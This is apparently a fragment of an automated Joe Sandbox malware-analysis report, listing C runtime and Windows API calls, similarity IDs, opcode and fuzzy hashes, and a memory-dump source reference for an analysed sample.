                                                                                                                                      APIs
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                      APIs
                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                      APIs
                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                      APIs
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: \;q$\;q$\;q$\;q
                                                                                                                                      • API String ID: 0-2933265366
                                                                                                                                      • Opcode ID: 4a7cece669b12d03f20542c068962d42d7ac8e97f1b59746bc1ae405820f9892
                                                                                                                                      • Instruction ID: c781a66d4d48334e7dea1fd06856a672a6b97027e4bdaff8c44da5f6a8c35846
                                                                                                                                      • Opcode Fuzzy Hash: 4a7cece669b12d03f20542c068962d42d7ac8e97f1b59746bc1ae405820f9892
                                                                                                                                      • Instruction Fuzzy Hash: 930184317805548FC724CA6DC448A3D77EEAF886A473A426AE902CB374DB35EC51C750